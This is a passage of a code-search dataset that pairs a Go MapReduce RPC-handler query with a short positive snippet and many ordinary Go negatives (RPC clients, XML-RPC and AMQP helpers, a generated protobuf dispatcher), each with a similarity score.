{\n\treturn validate.NewErrors(), nil\n}", "func (s *NFSStoreSpec) UpdateStatus(rsrc interface{}, reconciled []ResourceInfo, err error) {\n\tstatus := rsrc.(*AirflowBaseStatus)\n\tstatus.Storage = ComponentStatus{}\n\tif s != nil {\n\t\tstatus.Storage.update(reconciled, err)\n\t\tif status.Storage.Status != StatusReady {\n\t\t\tstatus.Status = StatusInProgress\n\t\t}\n\t}\n}", "func (policy *ServersConnectionPolicy) ValidateUpdate(old runtime.Object) (admission.Warnings, error) {\n\tvalidations := policy.updateValidations()\n\tvar temp any = policy\n\tif runtimeValidator, ok := temp.(genruntime.Validator); ok {\n\t\tvalidations = append(validations, runtimeValidator.UpdateValidations()...)\n\t}\n\treturn genruntime.ValidateUpdate(old, validations)\n}", "func (t *TeamResource) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (w *ClusterDynamicClient) UpdateStatus(obj *unstructured.Unstructured, options metav1.UpdateOptions) (*unstructured.Unstructured, error) {\n\treturn w.dClient.Resource(w.resource).Namespace(w.namespace).UpdateStatus(w.ctx, obj, options)\n}", "func (c *Chat) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (c *FakeNfsshares) UpdateStatus(nfsshare *v1alpha1.Nfsshare) (*v1alpha1.Nfsshare, error) {\n\tobj, err := c.Fake.\n\t\tInvokes(testing.NewUpdateSubresourceAction(nfssharesResource, \"status\", c.ns, nfsshare), &v1alpha1.Nfsshare{})\n\n\tif obj == nil {\n\t\treturn nil, err\n\t}\n\treturn obj.(*v1alpha1.Nfsshare), err\n}", "func (remoteStatus *RemoteStatus) Update() *RemoteStatus {\n\tremoteStatus.Online = time.Now().Before(remoteStatus.LastTransferredLifeSignDate.Add(1*time.Minute + 30*time.Second))\n\tremoteStatus.Lifesign = Time{remoteStatus.LastTransferredLifeSignDate}.ToIso8601()\n\treturn remoteStatus\n}", "func verifyNetworkState(t *testing.T, tenant, network, encap, subnet, gw string, subnetLen uint, pktTag, extTag int) {\n\tnetworkID := network + \".\" + tenant\n\tnwCfg := &mastercfg.CfgNetworkState{}\n\tnwCfg.StateDriver = stateStore\n\terr := nwCfg.Read(networkID)\n\tif err != nil {\n\t\tt.Fatalf(\"Network state for %s not found. Err: %v\", networkID, err)\n\t}\n\n\t// verify network params\n\tif nwCfg.Tenant != tenant || nwCfg.NetworkName != network ||\n\t\tnwCfg.PktTagType != encap || nwCfg.SubnetIP != netutils.GetSubnetAddr(subnet, subnetLen) || nwCfg.Gateway != gw {\n\t\tt.Fatalf(\"Network state {%+v} did not match expected state\", nwCfg)\n\t}\n\n\t// verify network tags\n\tif (pktTag != 0 && nwCfg.PktTag != pktTag) ||\n\t\t(extTag != 0 && nwCfg.ExtPktTag != extTag) {\n\t\tt.Fatalf(\"Network tags %d/%d did not match expected %d/%d\",\n\t\t\tnwCfg.PktTag, nwCfg.ExtPktTag, pktTag, extTag)\n\t}\n}", "func (m *TapiConnectivityUpdateconnectivityserviceInput) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateConnectivityConstraint(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateEndPoint(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateResilienceConstraint(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateRoutingConstraint(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateState(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateTopologyConstraint(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}" ]
[ "0.7406666", "0.68307406", "0.64648366", "0.64205205", "0.63305455", "0.615615", "0.57889855", "0.5749044", "0.56802106", "0.56731206", "0.56397283", "0.5616703", "0.5597998", "0.552378", "0.55079824", "0.550207", "0.55003566", "0.5485629", "0.54382426", "0.54291725", "0.5423983", "0.5420819", "0.54124063", "0.5379394", "0.5359991", "0.5281023", "0.5266936", "0.5239572", "0.52320635", "0.5231592", "0.52283233", "0.52220875", "0.5213653", "0.5179768", "0.5176711", "0.5148302", "0.51237947", "0.51154274", "0.5096459", "0.5096459", "0.5086183", "0.50718987", "0.5065884", "0.50617933", "0.50554514", "0.50478023", "0.50443536", "0.5035094", "0.5029002", "0.5015931", "0.5005546", "0.5003987", "0.49988252", "0.49946684", "0.4984742", "0.49683028", "0.49622175", "0.49568588", "0.4956527", "0.49518144", "0.49455371", "0.49402934", "0.49284118", "0.49204716", "0.49199152", "0.49082768", "0.48997962", "0.48901692", "0.48887998", "0.4874186", "0.48670298", "0.48633218", "0.48596364", "0.48574045", "0.4857014", "0.48530987", "0.4851599", "0.48506865", "0.4841192", "0.4840487", "0.4838056", "0.4831023", "0.4830933", "0.4828712", "0.482369", "0.4823426", "0.48196027", "0.4817821", "0.48117435", "0.48058864", "0.48041615", "0.47943994", "0.47905388", "0.47882596", "0.47878706", "0.47816968", "0.47780016", "0.47762403", "0.47760066", "0.47757965" ]
0.8169572
0
Your code here RPC handlers for the worker to call. an example RPC handler. the RPC argument and reply types are defined in rpc.go.
func (m *Master) Example(args *ExampleArgs, reply *ExampleReply) error { reply.Y = args.X + 1 return nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func callWorker(worker, name string, args interface{}, reply interface{}) bool {\n\treturn call(worker, \"RPCWorker.\"+name, args, reply)\n}", "func (rm *REKTManager) worker(req http.Request) Response {\n\tresp, err := rm.client.Do(&req)\n\tif err != nil {\n\t\treturn Response{make([]byte, 0), err}\n\t}\n\tdefer resp.Body.Close()\n\n\tdata, err := ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\treturn Response{make([]byte, 0), err}\n\t}\n\n\treturn Response{data, err}\n}", "func (cl *Client) DoRPC(functionName string, args interface{}) (response interface{}, err error) {\n\t/*\n\t\tDoes a remote procedure call using the msgpack2 protocol for RPC that return a QueryReply\n\t*/\n\tif args == nil {\n\t\treturn nil, fmt.Errorf(\"args must be non-nil - have: args: %v\", args)\n\t}\n\tmessage, err := msgpack2.EncodeClientRequest(\"DataService.\"+functionName, args)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqURL := cl.BaseURL + \"/rpc\"\n\treq, err := http.NewRequestWithContext(context.Background(), \"POST\", reqURL, bytes.NewBuffer(message))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treq.Header.Set(\"Content-Type\", \"application/x-msgpack\")\n\tclient := new(http.Client)\n\tresp, err := client.Do(req)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer func(resp *http.Response) {\n\t\tif err2 := resp.Body.Close(); err2 != nil {\n\t\t\tlog.Error(fmt.Sprintf(\"failed to close http client for marketstore api. err=%v\", err2))\n\t\t}\n\t}(resp)\n\n\t// Handle any error in the RPC call\n\tconst statusOK = 200\n\tif resp.StatusCode != statusOK {\n\t\tbodyBytes, err2 := goio.ReadAll(resp.Body)\n\t\tvar errText string\n\t\tif err2 != nil {\n\t\t\terrText = err2.Error()\n\t\t} else if bodyBytes != nil {\n\t\t\terrText = string(bodyBytes)\n\t\t}\n\t\treturn nil, fmt.Errorf(\"response error (%d): %s\", resp.StatusCode, errText)\n\t}\n\n\t// Unpack and format the response from the RPC call\n\tdecodeFunc, found := decodeFuncMap[functionName]\n\tif !found {\n\t\treturn nil, fmt.Errorf(\"unsupported RPC response\")\n\t}\n\treturn decodeFunc(resp)\n}", "func rpc(w http.ResponseWriter, r *http.Request) {\n\t// Parses the command into the rpc struct\n\tvar rpc rpcCall\n\tbodyBytes, err := ioutil.ReadAll(r.Body)\n\tif err != nil {\n\t\tsendHTTPResp(w, 500, err)\n\t\treturn\n\t}\n\n\terr = json.Unmarshal(bodyBytes, &rpc)\n\tif err != nil {\n\t\tsendHTTPResp(w, 500, err)\n\t\treturn\n\t}\n\n\t// Processes the rpc opcodes\n\tif rpc.Call == \"mkdirp\" { // Opcode for creating new dirs\n\t\tpath, err := validPath(rpc.Args[0])\n\t\tif err != nil {\n\t\t\tsendHTTPResp(w, 500, err)\n\t\t\treturn\n\t\t}\n\n\t\terr = os.MkdirAll(path, os.ModePerm)\n\t\tif err != nil {\n\t\t\tsendHTTPResp(w, 500, err)\n\t\t\treturn\n\t\t}\n\n\t} else if rpc.Call == \"mv\" { // Opcode for moving/renaming files\n\t\tsrcPath, err := validPath(rpc.Args[0])\n\t\tif err != nil {\n\t\t\tsendHTTPResp(w, 500, err)\n\t\t\treturn\n\t\t}\n\t\tdstPath, err := validPath(rpc.Args[1])\n\t\tif err != nil {\n\t\t\tsendHTTPResp(w, 500, err)\n\t\t\treturn\n\t\t}\n\n\t\terr = os.Rename(srcPath, dstPath)\n\t\tif err != nil {\n\t\t\tsendHTTPResp(w, 500, err)\n\t\t\treturn\n\t\t}\n\t} else if rpc.Call == \"rm\" { // Opcode for removing files\n\t\tpath, err := validPath(rpc.Args[0])\n\t\tif err != nil {\n\t\t\tsendHTTPResp(w, 500, err)\n\t\t\treturn\n\t\t}\n\n\t\terr = os.RemoveAll(path)\n\t\tif err != nil {\n\t\t\tsendHTTPResp(w, 500, err)\n\t\t\treturn\n\t\t}\n\t}\n\n\tw.Write([]byte(\"ok\"))\n}", "func Rpc(queue string, message interface{}, conn *amqp.Connection, l *logging.Logger) ([]byte, error) {\n\n\tl.Info(\"Executing RPC to queue: %s\", queue)\n\tl.Debug(\"Getting Channel for RPC\")\n\tchannel, err := conn.Channel()\n\tdefer channel.Close()\n\tl.Debug(\"Got Channel for RPC\")\n\n\tvar q amqp.Queue\n\tvar msgs <-chan amqp.Delivery\n\n\tl.Debug(\"Declaring Queue for RPC\")\n\tq, err = channel.QueueDeclare(\n\t\t\"\",\n\t\tfalse,\n\t\tfalse,\n\t\ttrue,\n\t\tfalse,\n\t\tnil,\n\t)\n\tif err != nil {\n\t\tdebug.PrintStack()\n\t\tl.Errorf(\"Failed to declare a queue: %v\", err)\n\t\treturn nil, err\n\t}\n\tl.Debug(\"Declared Queue for RPC\")\n\tl.Debug(\"Registering consumer for RPC\")\n\tmsgs, err = channel.Consume(\n\t\tq.Name,\n\t\t\"\",\n\t\ttrue,\n\t\tfalse,\n\t\tfalse,\n\t\tfalse,\n\t\tnil,\n\t)\n\tif err != nil {\n\t\tdebug.PrintStack()\n\t\tl.Errorf(\"Failed to register a consumer: %v\", err)\n\t\treturn nil, err\n\t}\n\n\tl.Debug(\"Registered consumer for RPC\")\n\tcorrId := randomString(32)\n\n\tmrs, err := json.Marshal(message)\n\tif err != nil {\n\t\tl.Errorf(\"Error while marshaling: %v\", err)\n\t\treturn nil, err\n\t}\n\tl.Debug(\"Publishing message to queue %s\", queue)\n\terr = channel.Publish(\n\t\tOpenbatonExchangeName, // exchange\n\t\tqueue, // routing key\n\t\tfalse, // mandatory\n\t\tfalse, // immediate\n\t\tamqp.Publishing{\n\t\t\tContentType: AmqpContentType,\n\t\t\tCorrelationId: corrId,\n\t\t\tReplyTo: q.Name,\n\t\t\tBody: []byte(mrs),\n\t\t})\n\n\tif err != nil {\n\t\tl.Errorf(\"Failed to publish a message\")\n\t\treturn nil, err\n\t}\n\tl.Debugf(\"Published message to queue %s\", queue)\n\n\tfor d := range msgs {\n\t\tif corrId == d.CorrelationId {\n\t\t\tl.Debug(\"Received Response\")\n\t\t\treturn d.Body, nil\n\t\t}\n\t}\n\treturn nil, errors.New(fmt.Sprintf(\"Not found message with correlationId [%s]\", corrId))\n}", "func main() {\n\thandleRequests := func(w http.ResponseWriter, r *http.Request) {\n\t\tbody, err := ioutil.ReadAll(r.Body)\n\t\tif err == nil {\n\t\t\tbuf := bytes.NewBuffer(body).String()\n\n\t\t\tif handleMtSupporteMethods(buf, w) {\n\t\t\t\treturn\n\t\t\t} else if handleMetaWeblogGetRecentPosts(buf, w) {\n\t\t\t\treturn\n\t\t\t} else if handleMetaWeblogNewPost(buf, w) {\n\t\t\t\treturn\n\t\t\t} else {\n\t\t\t\tfmt.Println(\"Not a known method call %s\", buf)\n\t\t\t\t// return error\n\t\t\t\tio.WriteString(w, \"<?xml version=\\\"1.0\\\"?><methodResponse><fault><value><struct><member><name>faultCode</name><value><int>-32601</int></value></member><member><name>faultString</name><value><string>server error. requested method not found</string></value></member></struct></value></fault></methodResponse>\")\n\t\t\t}\n\t\t} else {\n\t\t\tfmt.Println(err)\n\t\t\tio.WriteString(w, \"<?xml version=\\\"1.0\\\"?><methodResponse><fault><value><struct><member><name>faultCode</name><value><int>-32601</int></value></member><member><name>faultString</name><value><string>server error. requested method not found</string></value></member></struct></value></fault></methodResponse>\")\n\t\t}\n\t}\n\n\thttp.HandleFunc(\"/xmlrpc.php\", handleRequests)\n\n\tlog.Println(\"Starting XML-RPC server on localhost:80/xmlrpc.php\")\n\tlog.Fatal(http.ListenAndServe(\":80\", nil))\n}", "func main() {\n\n\t// The command line arguments. args[1] is the supervisor address,\n\t// args[2] is the port to run on\n\targs := os.Args\n\n\t// If the right number of arguments weren't passed, ask for them.\n\tif len(args) != 3 {\n\t\tfmt.Println(\"Please pass the hostname of the supervisor and the outgoing port.\" +\n\t\t\t\"eg. http://stu.cs.jmu.edu:4001 4031\")\n\t\tos.Exit(1)\n\t}\n\n\tresp, err := http.Post(args[1]+\"/register\", \"text/plain\", strings.NewReader(args[2]))\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tbuf := new(bytes.Buffer)\n\tbuf.ReadFrom(resp.Body)\n\n\t// This gives what the supervisor thinks the worker is, which is useful for debugging.\n\t_ = data.JsonToWorker(buf.Bytes())\n\n\t// If there is a request for /newjob,\n\t// the new_job routine will handle it.\n\thttp.HandleFunc(\"/newjob\", new_job)\n\n\t// Listen on a port.\n\tlog.Fatal(http.ListenAndServe(\":\"+args[2], nil))\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\tw := worker{}\n\tw.mapf = mapf\n\tw.reducef = reducef\n\tw.register()\n\tw.check()\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\n}", "func HandleRpcs(cmd PB_CommandToServer, params RPC_UserParam, rpcHandler RPC_AllHandlersInteract, responseHandler RPC_ResponseHandlerInterface) {\n\n\tsplits := strings.Split(cmd.Command, \".\")\n\n\tif len(splits) != 2 {\n\t\tnoDevErr(errors.New(\"HandleRpcs: splic is not 2 parts\"))\n\t\treturn\n\t}\n\n\tswitch splits[0] {\n\n\tcase \"RPC_Auth\":\n\n\t\t//rpc,ok := rpcHandler.RPC_Auth\n\t\trpc := rpcHandler.RPC_Auth\n\t\t/*if !ok {\n\t\t e:=errors.New(\"rpcHandler could not be cast to : RPC_Auth\")\n\t\t noDevErr(e)\n\t\t RPC_ResponseHandler.HandelError(e)\n\t\t return\n\t\t}*/\n\n\t\tswitch splits[1] {\n\t\tcase \"CheckPhone\": //each pb_service_method\n\t\t\tload := &PB_UserParam_CheckUserName2{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.CheckPhone(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Auth.CheckPhone\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserResponse_CheckUserName2\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",\"RPC_Auth.CheckPhone\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SendCode\": //each pb_service_method\n\t\t\tload := &PB_UserParam_CheckUserName2{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SendCode(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Auth.SendCode\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserResponse_CheckUserName2\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",\"RPC_Auth.SendCode\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SendCodeToSms\": //each pb_service_method\n\t\t\tload := &PB_UserParam_CheckUserName2{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SendCodeToSms(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Auth.SendCodeToSms\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserResponse_CheckUserName2\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",\"RPC_Auth.SendCodeToSms\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SendCodeToTelgram\": //each pb_service_method\n\t\t\tload := &PB_UserParam_CheckUserName2{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SendCodeToTelgram(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Auth.SendCodeToTelgram\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserResponse_CheckUserName2\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",\"RPC_Auth.SendCodeToTelgram\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SingUp\": //each pb_service_method\n\t\t\tload := &PB_UserParam_CheckUserName2{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SingUp(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Auth.SingUp\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserResponse_CheckUserName2\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",\"RPC_Auth.SingUp\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SingIn\": //each pb_service_method\n\t\t\tload := &PB_UserParam_CheckUserName2{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SingIn(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Auth.SingIn\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserResponse_CheckUserName2\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",\"RPC_Auth.SingIn\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"LogOut\": //each pb_service_method\n\t\t\tload := &PB_UserParam_CheckUserName2{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.LogOut(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Auth.LogOut\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserResponse_CheckUserName2\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",\"RPC_Auth.LogOut\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tdefault:\n\t\t\tnoDevErr(errors.New(\"rpc method is does not exist: \" + cmd.Command))\n\t\t}\n\tcase \"RPC_Chat\":\n\n\t\t//rpc,ok := rpcHandler.RPC_Chat\n\t\trpc := rpcHandler.RPC_Chat\n\t\t/*if !ok {\n\t\t e:=errors.New(\"rpcHandler could not be cast to : RPC_Chat\")\n\t\t noDevErr(e)\n\t\t RPC_ResponseHandler.HandelError(e)\n\t\t return\n\t\t}*/\n\n\t\tswitch splits[1] {\n\t\tcase \"AddNewMessage\": //each pb_service_method\n\t\t\tload := &PB_ChatParam_AddNewMessage{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.AddNewMessage(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Chat.AddNewMessage\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_ChatResponse_AddNewMessage\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_AddNewMessage\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_AddNewMessage\",\"RPC_Chat.AddNewMessage\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SetRoomActionDoing\": //each pb_service_method\n\t\t\tload := &PB_ChatParam_SetRoomActionDoing{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SetRoomActionDoing(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Chat.SetRoomActionDoing\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_ChatResponse_SetRoomActionDoing\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_SetRoomActionDoing\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_SetRoomActionDoing\",\"RPC_Chat.SetRoomActionDoing\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SetMessagesRangeAsSeen\": //each pb_service_method\n\t\t\tload := &PB_ChatParam_SetChatMessagesRangeAsSeen{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SetMessagesRangeAsSeen(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Chat.SetMessagesRangeAsSeen\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_ChatResponse_SetChatMessagesRangeAsSeen\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_SetChatMessagesRangeAsSeen\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_SetChatMessagesRangeAsSeen\",\"RPC_Chat.SetMessagesRangeAsSeen\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"DeleteChatHistory\": //each pb_service_method\n\t\t\tload := &PB_ChatParam_DeleteChatHistory{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.DeleteChatHistory(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Chat.DeleteChatHistory\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_ChatResponse_DeleteChatHistory\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_DeleteChatHistory\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_DeleteChatHistory\",\"RPC_Chat.DeleteChatHistory\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"DeleteMessagesByIds\": //each pb_service_method\n\t\t\tload := &PB_ChatParam_DeleteMessagesByIds{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.DeleteMessagesByIds(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: 